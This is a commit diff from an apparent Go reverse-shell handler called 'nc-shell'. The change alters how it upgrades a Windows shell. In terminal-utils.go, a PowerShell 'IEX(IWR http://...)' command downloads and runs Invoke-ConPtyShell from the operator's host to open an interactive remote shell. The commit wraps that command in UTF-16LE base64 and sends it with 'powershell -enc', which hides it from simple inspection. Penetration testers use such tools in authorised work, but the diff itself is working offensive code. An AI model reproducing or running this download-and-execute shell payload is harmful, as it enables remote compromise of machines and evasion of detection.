Base64 encode the powershell command

nodauf · Apr 8, 2021 · b5fc1cb · b5fc1cb
1 parent 8f51599
commit b5fc1cb
Show file tree

Hide file tree

Showing 3 changed files with 20 additions and 36 deletions.
diff --git a/src/terminal/terminal-utils.go b/src/terminal/terminal-utils.go
@@ -2,7 +2,6 @@ package terminal
 
 import (
 	"bytes"
-	"fmt"
 	"io"
 	"log"
 	utils "nc-shell/src/utils"
@@ -306,8 +305,10 @@ func (terminal *Terminal) interactiveReverseShellLinux() {
 
 func (terminal *Terminal) interactiveReverseShellWindows() {
 	terminal.getTerminalSize()
-	command := `powershell IEX(IWR http://` + terminal.Con.LocalAddr().String() + ` -UseBasicParsing); Invoke-ConPtyShell ` + strings.Split(terminal.Con.LocalAddr().String(), ":")[0] + " " + strings.Split(terminal.Con.LocalAddr().String(), ":")[1] + " -Rows " + terminal.rows + " -Cols " + terminal.cols
+	payloadPowershell := `IEX(IWR http://` + terminal.Con.LocalAddr().String() + ` -UseBasicParsing); Invoke-ConPtyShell ` + strings.Split(terminal.Con.LocalAddr().String(), ":")[0] + " " + strings.Split(terminal.Con.LocalAddr().String(), ":")[1] + " -Rows " + terminal.rows + " -Cols " + terminal.cols
+	payloadPowershell, _ = utils.Utf16leBase64(payloadPowershell)
+	command := "powershell -enc " + payloadPowershell
 	terminal.Log.Debug("Send the command: " + command)
-	terminal.execute(command)
+	terminal.execute(command, []byte{promptWindows1})
 	terminal.Con.Close()
 }
diff --git a/src/terminal/terminal.go b/src/terminal/terminal.go
@@ -137,6 +137,12 @@ func (terminal *Terminal) Connect() int {
 		// Set the terminal to raw mode
 		terminal.sttyRawEcho("enable")
 	}
+	// The terminal is natively in raw mode with go-prompt, we need to disable the raw mode when this is not necessary
+	// If the client is windows OS and we disable ConPTY, the raw mode is not needed
+	if terminal.OS == "windows" && terminal.Options.DisableConPTY {
+		terminal.sttyRawEcho("disable")
+	}
+
 	chanToStdout := terminal.streamCopy(terminal.Con, os.Stdout, false)
 	chanToRemote := terminal.streamCopy(os.Stdin, terminal.Con, true)
 

diff --git a/src/utils/utils.go b/src/utils/utils.go
@@ -1,8 +1,9 @@
 package utils
 
 import (
-	"fmt"
-	"net"
+	"encoding/base64"
+
+	"golang.org/x/text/encoding/unicode"
 )
 
 // Backspace character
@@ -48,36 +49,12 @@ type Iface struct {
 	IP   string
 }
 
-// ListInterfaces returns a slice of struct iface (Name of interface with the IP) which are the interfaces on the system
-func ListInterfaces() []Iface {
-	interfaces := []Iface{}
-	ifaces, err := net.Interfaces()
-	if err != nil {
-		fmt.Println(fmt.Errorf("localAddresses: %+v", err.Error()))
-		return nil
-	}
-	for _, i := range ifaces {
-		addrs, err := i.Addrs()
-		if err != nil {
-			fmt.Println(fmt.Errorf("localAddresses: %+v", err.Error()))
-			continue
-		}
-		for _, a := range addrs {
-
-			switch v := a.(type) {
-			case *net.IPNet:
-				// Test if it's ipv4
-				if v.IP.To4() != nil {
-					interfaces = append(interfaces, Iface{Name: i.Name, IP: v.IP.String()})
-				}
-
-			case *net.IPAddr:
-				// Test if it's ipv4
-				if v.IP.To4() != nil {
-					interfaces = append(interfaces, Iface{Name: i.Name, IP: v.IP.String()})
-				}
-			}
-		}
+func Utf16leBase64(s string) (string, error) {
+	var stringB64 = ""
+	utfEncoder := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM).NewEncoder()
+	ut16LeEncodedMessage, err := utfEncoder.String(s)
+	if err == nil {
+		stringB64 = base64.StdEncoding.EncodeToString([]byte(ut16LeEncodedMessage))
 	}
-	return interfaces
+	return stringB64, err
 }